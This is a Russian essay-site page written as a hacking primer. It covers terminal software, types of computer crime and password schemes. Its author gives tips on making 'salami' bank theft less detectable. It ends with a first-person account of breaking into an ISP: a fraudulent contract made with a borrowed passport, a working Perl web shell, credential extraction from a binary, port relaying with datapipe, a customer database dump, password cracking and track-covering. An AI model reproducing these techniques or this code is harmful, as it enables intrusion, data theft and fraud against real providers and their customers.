Полезное

Календарь
Март
Пн   6 13 20 27
Вт   7 14 21 28
Ср 1 8 15 22 29
Чт 2 9 16 23 30
Пт 3 10 17 24 31
Сб 4 11 18 25  
Вс 5 12 19 26  

Инструментарий несанкционированного доступа



Скачать: Инструментарий несанкционированного доступа

Содержание реферата

Введение
1. Коммуникационное программное обеспечение
   1.1. Прошлое и будущее
   1.2. Компьютерные преступления
   1.3. Денежные кражи
   1.4. Салями
   1.5. Саботаж
   1.6. Другие виды краж
   1.7. Седьмой вид преступлений
   1.8. Мотивы для занятий хакерством
2. Исследования перед взломом
   2.1. Пароли и контроль над доступом
      2.1.1. Пароли
3. Описание реального взлома провайдерской фирмы

Введение

Для того, чтобы стать удачливым компьютерным взломщиком, вам потребуется один прибор — ваши мозги. Вам не нужен даже компьютер. Более того, иногда бывает лучше вообще не иметь компьютера, как вы увидите в дальнейшем. Впрочем, для начала вам все же потребуется компьютер, модем и телефонная линия для связи с внешним миром. Компьютер может быть каким угодно. Гораздо важнее, какой у вас модем и коммуникационное программное обеспечение.

Хакерство — хобби, не требующее большого количества снаряжения; но если вам приходится что-то покупать, покупайте самое лучшее из того, что вы сможете себе позволить. Это не означает, что вы должны приобретать то, что вам предлагают продавцы или специальные журналы. Выбирайте то, что вам больше всего подойдет. Уверен, вы захотите, чтобы ваш модем был быстрым. Какой бы скоростью ни обладал ваш модем, он всегда будет работать несколько медленнее, чем вы ожидали. Из-за помех на линии модем бывает вынужден перепосылать данные снова и снова, пока не передаст или не примет их в неискаженном варианте. Модемы могут работать вполовину указанной скорости, и, если у них плохое настроение, и того медленнее. При передаче на дальние расстояния или если удаленные компьютеры слишком загружены, или при доступе к одному компьютеру через несколько других — чтобы вас труднее было выследить — скорость снижается еще больше. Итак, если вы хотите получать удовольствие от своих занятий — покупайте высокоскоростной модем.

1. Коммуникационное программное обеспечение

Бывает трудно найти действительно подходящую коммуникационную программу, но именно от нее, в совокупности с подходящим модемом, и зависит, принесет ли вам радость ваша работа в режиме он-лайн или только разочарует вас.

Существует много видов терминальных программ. Если какой-то пакет приложен к вашему модему, это еще не значит, что он вас устроит. Хорошая программа должна обладать ниже перечисленными свойствами и все они для хакера необходимы или хотя бы желательны.

Программа должна эмулировать достаточно большое количество разных терминалов, таких, например, как ANSI, VT52, VT100 и т. д. Неплохо, если программа располагает адресной таблицей — возможностью переводить входящие и выходящие символы в другие символы. Программа должна быть в состоянии посылать и принимать файлы, используя Xmodem, Ymodem, Zmodem и Kermit протоколы. Удостоверьтесь, что ваша терминальная программа располагает, по меньшей мере, этими четырьмя протоколами. Программа должна позволять управлять модемом используя "АТ"-команды. Вам также понадобится возможность обращаться к вашей операционной системе во время поддержания связи, т. к. иногда в процессе работы онлайн бывает нужно запустить другую программу. Программа должна включать в себя телефонную книжку, позволяющую хранить множество номеров, имен и комментариев. У вас должна быть возможность хранить более чем десятизначные телефонные номера, а также программа должна обеспечивать возможность написания сценариев соединения. Полезно также иметь автонабор, который сможет периодически перенабирать занятые телефонные номера. Наконец, программа должна быть простой и приятной в обращении. Если вы не можете найти одну программу, отвечающую всем вашим требованиям, имейте под рукой несколько, для выполнения различных функций. Хорошая общедоступная программа для IBM — Qmodem. И последнее, что необходимо хакеру. Ваша терминальная программа должна обладать возможностью сбора данных. Это значит, что, когда информация проходит через ваш модем и появляется на экране, вы можете сбросить ее в файл на диске.

Функция сбора данных должна быть включена всегда, когда вы используете свой модем. Сбор данных удобен также для записи текста, который пробегает по экрану так быстро, что вы не успеваете его прочесть. А иногда текст вообще немедленно стирается сразу же после ввода. К тому же приятно иметь документированное свидетельство своей хакерской деятельности, которое можно использовать для справок и исследований.

1.1. Прошлое и будущее

Читая издания о хакерстве, вы еще многое узнаете об оборудовании, программном и аппаратном обеспечении и о том, что необходимо хакерам, специализирующимся в конкретных областях. Но пока вам необходимо понять...

Читая литературу по защите данных, можно всерьез обеспокоиться. Прошли времена ошибок и лазеек в системах и времена наивных пользователей. Прошли, казалось бы, времена благоговейного страха перед хакером-одиночкой, среди ночи проникающим в секретные правительственные базы данных, и времена самих хакеров-одиночек.

Так кажется.

Но это не так! Всего несколько лет назад Роберту Моррису-младшему удалось проникнуть в систему, используя ошибки, которые никто не потрудился заметить и исправить. Кто знает, сколько еще таких ошибок ждет своего часа? Не забывайте и о глупости: существуют демонстрационные режимы, меры по безопасности, которые никто не уничтожил и не изменил.

В июле 1987 года группа членов клуба Chaos Computer Club взломала компьютерную сеть системы NASA SPAN. Эти хакеры использовали изъян в инфраструктуре VMS, по заявлению DEC Corporation, реконструированной тремя месяцами раньше. А это свыше ста VAX компьютеров с неисправной операционной системой. Члены клуба посмеивались, что для "зашиты" этой системы часто использовались примитивные пароли, подчас взятые прямо из руководства пользователя. С одной стороны мы видим суперсекретные компьютеры, опекаемые NASA, а с другой — 4000 пользователей этих компьютеров. Понятно, что 4000 человек не сохранят секрета.

В наши дни хакерство может показаться более трудным занятием, нежели раньше, но на самом деле оно не стало таким. Меры по безопасности могли стать строже, но сам пользователь ничуть не изменился в своей беспечности, равнодушии, добродушии по отношению к другим пользователям. Более опытные пользователи всегда рады помочь менее осведомленным, а те, в свою очередь, просят совета у "гуру". Значит, социальная инженерия, простая и обратная, живет и побеждает, как вы увидите далее.

Людьми всегда руководит стремление к простоте. Никто не выберет в качестве пароля нечто вроде "bWoQt 0(@vbM-34trwX51 "!

Сегодня создано немыслимое количество систем, в которых работает множество пользователей. Раньше на компьютерах работали лишь немногие, теперь же их может купить и использовать кто угодно. И далеко не все, кто этим занимается, помнят о компьютерной безопасности. Фактом является то, что большинство компьютерных систем не защищено от вторжения. Многие люди, связанные с компьютерами, понимают это, но ничего не предпринимают по этому поводу.

Причин, по которым компании не повышают уровень компьютерной безопасности, много. При этом приводятся следующие доводы:

• Усиление зашиты влечет за собой исчезновение открытости и доверия, которые мы стремимся развивать.

• Компьютерная зашита слишком неудобна.

• Усиление зашиты только привлечет любящих приключения хакеров.

• Закрывать существующие лазейки в защите слишком дорого и трудно.

• Перепрограммирование может повлечь за собой новые проблемы с безопасностью.

• У нас никогда не было проблем с безопасностью!

• Наша информация не нужна никому, кроме нас.

• Мы только что подверглись взлому; но уж теперь-то они точно не вернутся!

• А разве хакеры еще не исправились?

Все эти доводы не корректны. Последний вообще не выдерживает критики: компьютеры имеют такое большое значение в нашей жизни, что хакеры будут существовать всегда, пока существуют компьютеры.

В некоторых из этих доводов есть своя правда, во всяком случае, люди, занимающиеся компьютерами, верят в эти утверждения, так что работа для хакера всегда найдется.

1.2. Компьютерные преступления

К сожалению, в нашем мире существует такая штука, как компьютерные преступления. Хакерство занимает последнее место в списке безобразий, которые люди проделывают с компьютерами, и не имеет ничего общего с обычными преступлениями, убийствами, кражами и т. п.

Компьютерные преступления делятся на семь основных категорий, так или иначе связанных с хакерством: финансовые кражи, саботаж, кражи аппаратного обеспечения, кражи программного обеспечения, кражи информации и электронный шпионаж. А седьмое "преступление" — компьютерное хакерство.

1.3. Денежные кражи

Финансовые кражи происходят, когда компьютерные записи изменяются в целях присвоения чужих денег. Часто это делается с помощью программы, направляющей деньги на конкретный банковский счет, обычно с помощью техники "салями".

1.4. Салями

"Салями" — это метод, предполагающий кражи небольших сумм в течение длительного времени в надежде, что это не будет замечено. Воры перепрограммируют банковский или какой-либо другой компьютер так, чтобы пенни поступали на липовые счета.

Например, на счете может храниться 713.14863, где 863 случайные цифры, т. к. при умножении учитываются все знаки. Обычно компьютер показывает, что у данного лица в банке 713.15 $, округляя 4 до 5. Однако, компьютер, запрограммированный с "салями" отделяет эти экстра-числа и помешает их на отдельные счета. И теперь человек имеет только 713.14 $, ну кто же заметит или пожалуется на потерю пенни.

Компьютер сам не в состоянии производить новые деньги, он может только перевести легальные деньги на нелегальный счет. Такие кражи довольно трудно обнаружить. Как только на счете у вора скапливается большая сумма, он снимает деньги со счета и, в большинстве случаев, удаляется вместе с ними< Многие воры пытались использовать эту форму ограбления банка, и многие были пойманы, но сейчас это может сделать каждый.

Выявить применение подобной техники можно так: на компьютере создается список всех счетов с указанием, сколько раз в течение одного или нескольких дней к счету обращались. Затем любой счет, который требовался слишком часто, проверяется, чтобы установить, сколько денег с него снималось во время каждого обращения. Если это небольшая сумма - значит кому-то повезло.

Хотя сам я не занимаюсь подобными вещами, хочу все же указать, в чем заключается ошибка таких грабителей. Вместо того, чтобы перепрограммировать компьютер для прямой передачи небольших сумм на счет, им следовало просто вычитать эти деньги и следить за тем, сколько денег соберется в области, отдельной от файлов со счетами. Затем изменяются те части программы, которые распечатывают общее количество банковских вкладов, для учета скрытой суммы, чтобы эти деньги не казались утерянными. Когда спрятанное число достигает определенной величины, только тогда его следует переводить на счет вора, причем переводящиеся суммы должны равняться случайным величинам, дабы избежать подозрений.

Такие действия предполагают наличие доступа к компьютеру. Обычно их совершают сотрудники банка, и о настоящем хакерстве здесь речь не идет. Впрочем, если такую кражу совершает сотрудник с ограниченным уровнем доступа или чужак, взлом бывает необходим.

1.5. Саботаж

Компьютерный саботаж — это физическое разрушение аппаратного или программного обеспечения, либо искажение или уничтожение содержащейся в компьютере информации. Причиной саботажа может быть желание избавиться от конкурента или получить страховку. Компьютерное хакерство лишь косвенно связано с саботажем, поскольку целью большинства хакеров является сохранение компьютеров, а не разрушение. Впрочем, иногда в хакерстве присутствуют элементы саботажа. Обратная социальная инженерия использует нечто вроде саботажа, но на самом деле это всего лишь временный и легко устраняемый вывод компьютера из строя.

Компьютерные вандалы часто подвергают саботажу информацию, хранящуюся в компьютерах, сперва использовав хакерские методы получения доступа к ним. Но не стоит путать вандалов и других приверженцев саботажа данных с хакерами. Эти люди вводят ложную информацию в компьютерные системы, так или иначе повреждая базы данных.

1.6.  Другие виды краж

Могут включать в себя кражи аппаратного обеспечения или самого компьютера и периферии, а также воровство компьютерных разработок. Они относятся к хакерству постольку, поскольку украденный компьютер может использоваться для получения кодов доступа. В случае компьютерного пиратства хакер может тайно читать электронную почту или файлы разработчика, пытаясь украсть новые идеи.

Кражи программного обеспечения, или программное пиратство, — это нелегальное копирование программ, защищенных авторскими правами. Хакеры часто делают для себя копии программ, найденных в компьютерной системе, чтобы понять, как они работают. Что касается краж аппаратного обеспечения, здесь присутствует желание догнать конкурента в области новых разработок программ.

Кражи информации включают кражи кредитных карточек, результатов лабораторных исследований, данные о пациентах или клиентах и вообще любых данных, обладающих потенциальной ценностью. Электронным шпионажем называется продажа такой информации третьей стороне, когда хакер начинает шпионить на другую компанию или страну. В обоих случаях для краж информации, а иногда и для установления контакта со шпионским агентством используется хакерская техника.

1.7. Седьмой вид преступлений

Наконец, мы подошли непосредственно к хакерству. Хакеры способны совершать любые из вышеперечисленных преступлений, но они предпочитают этого не делать. Так можно ли считать их преступниками?

Конечно, перед тем, как сделать такой выбор, хакер нелегально взламывает чужие компьютеры. Но мы не видим никакого вреда в самом акте "взлома".

Там, где имеют место другие компьютерные преступления, мотивы преступника ясны. Вполне понятно, когда человек крадет компьютер, заказывает преступление из чувства мести или из корыстных побуждений.

Но в случае "чистого" хакерства мотивы могут и не лежать на поверхности.

Традиционная причина для занятий хакерством -стремление к знаниям. Но в наши дни этим стремлением могут руководить более сильные желания, например, жажда денег. Существуют хакеры, относящиеся к своему таланту не как к хобби, а как к профессии. Насчитывается несколько причин, как моральных, так и аморальных, для занятий хакерством за деньги. Прежде чем начать разговор о том, как заниматься хакерством, давайте рассмотрим, почему им занимаются.

1.8. Мотивы для занятий хакерством

Самым честным побуждением к занятиям хакерством является распространение информации. Том Форестер и Перри Моррисон в своей "Компьютерной этике" пишут, что после чернобыльской аварии хакеры Chaos Computer Club "...опубликовали большее количество информации о событиях, чем даже правительство Восточной Германии. Вся эта информация была получена путем незаконных взломов содержимого государственных компьютеров...". Конечно, это было весьма благородно и "по-нашему".

Хакеры занимаются также предотвращением компьютерных несчастий. Недавно несколько компаний по компьютерной безопасности из разных стран решили подвергнуть свою продукцию проверке. Они опубликовали телефонные номера, по которым могли бы звонить хакеры и пытаться проникнуть в систему. Конечно, это был рекламный трюк, но сама идея была неплоха, поскольку дала хакерам возможность совершения взлома из лучших побуждений.

Хакеры, которые используют свои незаконные методы для предотвращения несчастий, обладают высокой нравственностью. Обнаружив прореху в защите системы (но не воспользовавшись ею!) они предупреждают о ней системного оператора. Таким образом, они помогают нашему миру свободно и безопасно пользоваться информацией. Мы только можем надеяться, что жизненное кредо хакеров не позволит им вести себя неэтично.

К сожалению, волнующая и заманчивая природа хакерства зачастую влечет к себе нравственно неразвитых людей, питающих слабость к вандализму и чужим кредитным карточкам. Настоящие хакеры не должны иметь никакого отношения к подобной деятельности, дабы не уронить звание "Хакера".

Многие хакеры, даже лучшие из них, внесли свой вклад в создание плохой репутации хакерства, т. к. ими руководили сомнительные мотивы. Встречаются и хакеры-разрушители, и такие, которые просто не могут вовремя выйти из игры.

Существует и "хакерство по найму". Частные лица готовы платить хакерам за то, чтобы те изменили для них информацию на компьютере: счета, уровни доступа и т. п. Иногда люди хотят уничтожить информацию о самих себе, поскольку скрываются. Частные сыщики тоже могут воспользоваться услугами хакеров, чтобы найти телефонные номера, адреса и другую необходимую им частную информацию, хранящуюся в компьютерах. Сотрудники офисов нанимают хакеров, чтобы прочесть электронную почту и файлы своих коллег и конкурентов. Хакеры могут заниматься не только промышленным, но даже государственным шпионажем. Все это ЕСТЬ, и этим занимаются хакеры, которые совершают взломы за деньги.

В хакерской среде с пренебрежением относятся к "наемникам". Один раз еще можно пойти на такое, но заниматься этим постоянно — значит лишиться хакерской чести. Мне хочется думать, что все читатели этой книги, в том числе и хакеры, будут использовать свои таланты для добрых дел: обеспечения общественной осведомленности, предотвращения трагедий, а также для изучения новых технологий и открытий в целях саморазвития.

2. Исследования перед взломом

Любой серьезный взлом требует некоторых подготовительных исследований, которые должен произвести хакер перед тем, как усесться за компьютер. Грамотному “взломщику” необходимо владеть определенным объемом информации.

Чтобы заняться хакерством, естественно, следует обладать кое-какими сведениями о компьютерах и телекоммуникациях (на уровне идей), но для реального взлома нужен, в первую очередь, телефонный номер, или какой-либо другой путь получения доступа к “вражескому” компьютеру. И в том, и в другом случае понадобится предварительное исследование. При первом обращении к компьютеру вам также придется исследовать возможные способы взлома и выбрать подходящий. И, наконец, вы будете производить исследования уже после того, как получите доступ к вожделенной системе, дабы извлечь как можно больше пользы из открывшихся перед вами возможностей.

2.1. Пароли и контроль над доступом

Для зашиты компьютерных установок на сегодняшний день имеются три основных класса контроля доступа. Это:

— контроль, основанный на знании (пароли);

— контроль, основанный на обладании (ключи);

В случае контроля, основанного на обладании, речь идет о предметах, принадлежащих пользователю, — физическом ключе, магнитной карте и т. д. Иногда используется металлическая пластинка причудливой формы, которую вставляют перед началом работы в щель распознавателя. “Ключом” может служить также идентификационный знак либо специальное письмо с подписью одного из высокопоставленных лиц компании.

2.1.1. Пароли

Самый простой и дешевый путь зашиты любого типа компьютерной системы сводится к старому, испытанному способу: применению пароля. Даже те компьютеры, которые вовсе не нуждаются в средствах зашиты, зачастую снабжаются паролем просто потому, что пароль дает ощущение психологического комфорта и его использование не требует особенно много времени, сил и места в памяти. Более того, в системах, уже защищенных другими средствами — магнитными картами или иными программными методами, типа шифрования, нередко удваивают или утраивают защиту содержимого, прибегая к системе паролей. Таким образом, практически все установки компьютеров включают в себя пароли того или иного вида.

Пароли, как правило, рассматриваются в качестве ключей для входа в систему, но они используются и для других целей: блокирование записи на дисковод, в командах на шифрование данных или на разархивацию файлов — короче, во всех тех случаях, когда требуется твердая уверенность в том, что соответствующие действия будут производиться только законными владельцами или пользователями программного обеспечения.

Пароли подразделяются на семь основных групп:

— пароли, устанавливаемые пользователем;

— пароли, генерируемые системой;

— случайные коды доступа, генерируемые системой;

— полуслова;

— ключевые фразы;

— интерактивные последовательности типа “вопрос — ответ”;

— “строгие” пароли.

Если вы решились на взлом, вам, прежде всего, необходимо вычислить, какой из этих семи видов паролей используется в данной системе.

Если вы решились на взлом, вам, прежде всего, необходимо вычислить, какой из этих семи видов паролей используется в данной системе.

Первый является наиболее распространенным — обычно пользователи, движимые мелким тщеславием, просят придумать себе личный пароль.

Случайные пароли и коды, устанавливаемые системой, могут быть нескольких разновидностей. Системное программное обеспечение может применить полностью случайную последовательность символов — случайную вплоть до регистров, цифр, пунктуациии длины; или же в генерирующих процедурах могут быть использованы ограничения. Например, каждый код доступа согласуется с заранее подготовленным шаблоном (вроде oabc-12345-efghn, где буквы и цифры, на заданных позициях, генерируются случайным образом). Создаваемые компьютером пароли могут также случайным образом извлекаться из списка обычных или ничего не значащих слов, созданных авторами программы, которые образуют пароли вроде onah.foopn, или ocar- back-treen. Полуслова частично создаются пользователем, а частично — каким-либо случайным процессом. Это значит, что если даже пользователь придумает легко угадываемый пароль, например, “секрет”, компьютер дополнит его какой-нибудь неразберихой, образовав более сложный пароль типа “секрет,5гh11”.

Ключевые фразы хороши тем, что они длинные и их трудно угадать, зато легко запомнить. Фразы могут быть осмысленными, типа “we were troubled by that”, или не иметь смысла — “fished up our nose”. Ключевые фразы применяются в тех организациях, где менеджер слегка помешан на защите. Следует заметить, что в программировании постепенно намечается тенденция к переходу на более широкое применение ключевых фраз.

К концепции ключевых фраз близка концепция кодового акронима, который эксперты по защите оценивают как короткую, но идеально безопасную форму пароля. В акрониме пользователь берет легко запоминающееся предложение, фразу, строчку из стихотворения и т. п., и использует первые буквы каждого слова в качестве пароля. Например, акронимами двух приведенных выше фраз являются “wwtbt” и “fuon”. Как видите, подобные нововведения в теории паролей значительно затрудняют занятия электронным шпионажем.

Шестой тип паролей — интерактивные последовательности “вопрос — ответ”, предлагают пользователю ответить на несколько вопросов, как правило, личного плана: “Девичья фамилия вашей супруги?”, “Ваш любимый цвет?”, и т. д. В компьютере хранятся ответы на множество таких вопросов. При входе пользователя в систему компьютер сравнивает полученные ответы с “правильными”. Сеансы вопросов и ответов могут оказаться лакомым кусочком для хакера, который хорошо знаком с пользователем, под чьим именем он пытается войти в систему. Системы с использованием вопросов — ответов склонны к тому же прерывать работу пользователя каждые десять минут, предлагая отвечать на вопросы, дабы подтвердить его право пользоваться системой. Это очень раздражает, особенно если пользователь погружен в интересную игру. Ныне такие пароли почти не используются. Когда их придумали, идея казалась неплохой, но раздражающий фактор прерывания привел к тому, что данный метод практически исчез из обихода.

“Строгие” пароли обычно используются совместно с каким-нибудь внешним электронным или механическим устройством - “цербером”. В этом случае компьютер обычно с простодушным коварством предлагает несколько вариантов приглашений, а бедолага-пользователь должен дать на них подходящие ответы. Этот вид паролей часто встречается в системах с одноразовыми кодами.

Одноразовые коды — это пароли, которые срабатывают только один раз. К ним иногда прибегают, создавая временную копию для гостей, чтобы продемонстрировать потенциальным клиентам возможности системы. Они также порой применяются при первом вхождении пользователя в систему. Во время первого сеанса пользователь вводит свой собственный пароль и в дальнейшем входит в систему лишь через него. Одноразовые коды могут также применяться в системе, когда действительный пользователь входит в нее в первый раз; затем пользователю следует поменять свой пароль на более секретный персональный код. В случаях, когда системой пользуется группа людей, но при этом нельзя нарушать секретность, прибегают к списку одноразовых кодов. Тот или иной пользователь вводит код, соответствующий времени, дате или дню недели. Может быть, вам повезет и вы найдете такой список в одном из своих походов за мусором. Коды, конечно, вам уже не пригодятся, но зато вы уразумеете принцип зашиты данной системы.

3. Описание реального взлома провайдерской фирмы

Информация взята с www.xakep.ru

История "начала иметь место быть" ранним июльским утром, когда меня разбудил телефонный звонок. Звонил мой приятель, к слову сказать, сотрудник одной из московских провайдерских фирм (назовем ее - www.провайдер.ру) и озадачил он меня неслабо. "Дружище", - сказал он, сразу хватая быка за рога. Нас тут один клиент поломал, упер клиентскую базу, просит халявного интернета взамен того, что он расскажет, как это было проделано. Инет-то мы ему дали, но есть подозрение, что человечек не раскрыл свои секреты до конца. Не мог бы ты помочь разобраться? Попробуй поломать нас/добраться до базы клиентов с предоставлением подробного отчета о проделанной работе и рекомендациями по устранению дыр в security". Финансовая сторона вопроса выглядела очень заманчиво, и мне пришлось согласиться...

Понедельник, 8-00 утра

Начнемс... Заходим на http://www.провайдер.ру и внимательно читаем информацию об услугах, которые он предоставляет. Как обычно, - выделенные линии, доступ по Dial-UP IP, домашние странички для клиентов и т.д. Лезем на www.ripn.net и вытаскиваем информацию о данном провайдере. 1 сетка класса C.... Скромненько, скромненько...

Запускаем nslookup, говорим ему "server=ns.провайдер.ру" и делаем "ls -d провайдер.ру"... Исследуем стянутую зону. Наиболее активно светятся 4 машинки и, судя по всему, они принимают самое непосредственное участие в технологии. Судя по количеству CNAMEов, на одном из хостов (hosting.провайдер.ру) крутится более 50 виртуальных WEB-серверов - здесь нам ловить нечего, разве что подменить пару страничек на каком-нибудь ВВВ.ВАСЯ_ПУПКИН.РУ. На следующей "технологической тачке" (mail.провайдер.ру) крутятся DNS, SMTP, POP3 сервера - этот вариант запомним, но отложим на потом. Наиболее интересной мне показалась машинка, на которой на одном IP-адресе крутится сервер статистики (http://statserv.провайдер.ру) данной компании вкупе с бесплатными домашними страничками (а-ля http://users.провайдер.ру/user_name/). Где-где, а на сервере статистики доступ к клиентской базе должен иметься! Как же туда попасть?

В течение суток аккуратно сканирую порты на этом сервере. Для всей СЕТИ открыты только следующие порты: 80, 8100, 8101, 8102, 8103, 8104 (UNIX/Apache 3.1.4.pl RUS). Все остальные сервисы аккуратно порезаны firewall'ом.

Запускаем браузер и пытаемся попасть на http://statserv.провайдер.ру. Не пускает! 403 Forbidden, говорит. Снова заходим на www.провайдер.ру и среди прочей информации обнаруживаем, что доступ к серверу статистики предоставляется только клиентам этой компании и только из внутренней сети, и на нем можно ознакомиться с количеством потребленных услуг и даже поменять пароль(!). Более того, каждому клиенту этого провайдера предоставляется возможность бесплатно завести домашнюю страничку. Но доступ к этой страничке предоставляется только из внутренней сети по протоколу FTP c тем же (!!!) логином/паролем, который используется для доступа в Интернет. Размышляем вслух... Если это так, то скорее всего и FTPd и Apache авторизуют пользователей из общей базы данных.

Пришлось даже проиндексировать (HT://Dig) все доступные WEB-странички на http://users.провайдер.ру/, однако следов использования CGI-скриптов не обнаружилось...

OK! Обратимся к человеческому фактору...

Вторник, 10-00

Подхожу на улице к молодому человеку бомжеватого вида и слезно умоляю (за 100 рублей) одолжить паспорт на некоторое время. Через 20 минут в моих руках оказался договор, согласно которому я, Иван Петрович Пуговкин имею право воспользоваться услугами Интернет через компанию www.провайдер.ру и, в числе прочих возможностей, завести собственную домашнюю страничку и проверить состояние лицевого счета на сервере статистики. Логин/пароль прилагаются.

Дело в том, что на сервере провайдера было написано, что "домашние странички следует готовить в кодировке win1251. Если вы используете другой тип кодировки, то в корневой каталог вашего сервера можно положить файл .htaccess с одной строчкой "CharsetSourceEnc koi-8r". Только в данной ситуации кодировки нас совсем не интересовали. Кладем в мой домашний каталог файл .htaccess, только строчка выглядела немного по другому - "Options Includes ExecCGI". Заливаем по FTP маленький файл (test.cgi),

=============== test.cgi =============

#!/usr/local/bin/perl

print "Content-type: text/html\n";

print "test\n";

=============== end of test.cgi ========

делаем "chmod 755" при помощи FTP-клиента. Запускаем браузер и заходим на http://users.провайдер.ру/user_name/test.cgi). Yes!!! Работает! Мы смогли запустить cgi-скрипт на perl, хотя провайдер и считает, что это невозможно. Сие означает, что, в принципе, мы можем запустить на сервере любую программу с правами пользователя, из под которой работает WEB-сервер (например, nobody). В качестве инструмента загружаем на сервер следующую утилиту (shell.cgi), изменяем ее атрибуты на 755,

==================== shell.cgi ==================

#!/usr/local/bin/perl

read (STDIN, $buffer, $ENV{'CONTENT_LENGTH'});

@names=split('&',$buffer);

foreach $name (@names)

{

($field,$value)=split('=',$name);

$value=~ s/\+/ /g;

$value=~ s/%([0-9A-Fa-f][0-9A-Fa-f])/pack("c",hex($1))/ge;

$form{$field}=$value;

}

print <<EOT

Content-type: text/html

<html>

<body bgcolor="#ffffff" onLoad="document.forms[0].com.focus()">

<form method="post" action="shell.cgi">

<input size=50 name="com">

</form>

EOT

;

$result = `$form{com} 2>&1`;

$result =~ s/\n/<br>/g;

print $result;

print "</body></html>\n";

================ end of shell.cgi ==================

заходим на http://users.провайдер.ру/user_name/shell.cgi) и в формочке (shell c правами пользователя nobody) набираем какую-нибудь UNIX-команду. Например, "date". Впрочем, сколько сейчас времени нас интересует только лишь по той причине, что прошло всего 15 минут с момента начала попытки взлома. А сейчас нас больше волнует конфигурационный файл сервера Apache. Обычно он находится здесь - /usr/local/apache/conf/httpd.conf. Пробуем его просмотреть при помощи нашей странички (shell.cgi) командой "cat /usr/local/apache/conf/httpd.conf". Оказалось, что на этом хосте одновременно функционируют два виртуальных Web-сервера (сервер статистики и сервер, где хранятся наши бесплатные странички). Начинаем изучать сервер статистики... Авторизация выполнена средствами Apache, причем авторизуется он в MySQL-базе (http://www.mysql.com) на сервере store.провайдер.ru.

============== httpd.conf =============

Auth_MYSQLinfo store.провайдер.ru nobody .

AuthName Mail_list

AuthType basic

Auth_MYSQLdatabase users

Auth_MYSQLpwd_table passwd

Auth_MYSQLuid_field email

Auth_MYSQLpwd_field passwd

Auth_MYSQLgrp_table logins

Auth_MYSQLgrp_field disal_group

Auth_MYSQL_EncryptedPasswords off

<limit get post>

order deny,allow

allow from all

require valid-user

</limit>

============== end of httpd.conf =========

Теперь мы точно знаем, где хранится клиентская база!

После непродолжительного изучения возможностей сервера статистики я нахожу скрипт, при помощи которого клиент может поменять пароль в базе (http://user_name:passwd@startserv.провайдер.ру/cgi-bin/connect.cgi). Снова захожу на http://users.провайдер.ру/user_name/shell.cgi и делаю "cat /usr/local/apache/doc/statserv/cgi-bin/connect.cgi". Эх! Не повезло! CGI-скрипт написан на языке Си и уже скомпилирован. Вот невезуха! Если бы использовался Perl, то пароль для доступа к MySQL можно было бы уже иметь на руках. Впрочем, настоящего кул-хацкера эта проблема не сможет надолго остановить!

Вторник, 12-00

Итак, мы имеем скомпиленный скрипт, который умеет коннектиться к MySQL-серверу на store.провайдер.ru (где, судя по всему, и находится то, что нас интересует). Причем в качестве входных параметров этот скрипт использует переменные REMOTE_USER и REMOTE_PASSWD (наш логин/пароль, при помощи которых мы авторизовались на сервере статистики). Интересно, а на какой системе скомпилена эта штука? Набираем "uname -an" и получаем Linux Mandrake 7.0. Класс! У меня на компьютере используется то же самое. Копирую (через shell.cgi) этот скрипт в свой домашний каталог и перекачиваю по FTP к себе на машинку. После изучения кода в HEX-редакторе оказывается, что программа использует libmysqlclient.so.6.0, что коннектится она к store.провайдер.ru:3306 к базе users и что логин/пароль вкомпилированы непосредственно в нее. Помучаться пришлось немало, но в итоге я научил эту программу запускаться на моем компьютере.

Следующим этапом было написание софтинки, которая слушает порт 3306 и в минимальном объеме эмулирует работу MySQL-сервера. Прописав в файл /etc/hosts строчку о том, что мой компьютер - store.провайдер.ru, я научил скрипт коннектиться в то самое место, которое мне было нужно. Не буду описывать подробности, факт тот, что логин/пароль для доступа к MySQL-серверу на store.провайдер.ру я все-таки вытащил.

Среда, 21-30

Предварительно просканировав store.провайдер.ру на наличие открытых портов, я понял, что проще всего добираться до MySQL-базы через хост users.провайдер.ру. Немного поразмыслив, я решил просто подвесить там "трубу", т.е. устроить редирект таким образом, чтобы, законнектившись на users.провайдер.ру:23456, я автоматически попадал на store.провайдер.ru:3306. На сервере http://www.rootshell.org нашлась программа datapipe.c. Загрузив ее на сервер и скомпилив ее через nobody-shell, который мы "поимели" пару часов назад (http://users.провайдер.ру/user_name/shell.cgi) мы получаем готовый транспорт для взлома. Остается только его запустить. Что и делается командой "./datapipe 23456 3306 store.провайдер.ru 2>&1".

А теперь, - самый ответственный момент. На своем компьютере я запускаю MySQL-клиента.командой

"mysql --port=23456 --host=users.провайдер.ру --user=view --password=qwerty users". Yes!!!!!!! Сработало!!! Набираю команду "show tables" и вижу долгожданный результат на экране моего компьютера. В базе users оказалось 4 таблицы (users_table, passwd_table, info_table, contracts). К чести провайдера, для пользователя view была открыта только одна таблица для записи - passwd_table, остальные таблицы были открыты только для чтения, но этого было достаточно - доступ к базе я уже получил.

Сделав dump MySQL-базы к себе на винчестер

("mysqldump --port=23456 --host=users.провайдер.ру --user=view --password=qwerty users > dump_file"), я начал заметать следы. Собственно, оставалось только убить процесс datapipe (killall datapipe), который мы запустили на сервере users.провайдер.ру из под пользователя nobody и удалить все лишние файлы, которые мы наплодили. Все! Дело сделано! Можно передохнуть самую малось, выпить бутылочку пива и заняться разбором "спертой базы данных". Самое интересное - это, естественно, таблица с паролями (к слову сказать, они хранились в зашифрованном виде, но простейший crack_passwd со словарем подобрал около 50 за 20 минут).

На тот момент заказчик вынес для себя самое главное правило - НИКОГДА НЕ ОБЪЕДИНЯЙ ТЕХНОЛОГИЮ с СЕРВИСАМИ ДЛЯ КЛИЕНТОВ. А немного позднее, один из злобных хакеров научился бесплатно звонить в Америку через модемный пул этого провайдера и мы занялись "дырочкой" с reverse-telnet. Но это уже совсем другая история...



  © Реферат плюс


Поиск
Реклама

  © REFERATPLUS.RU  

Яндекс.Метрика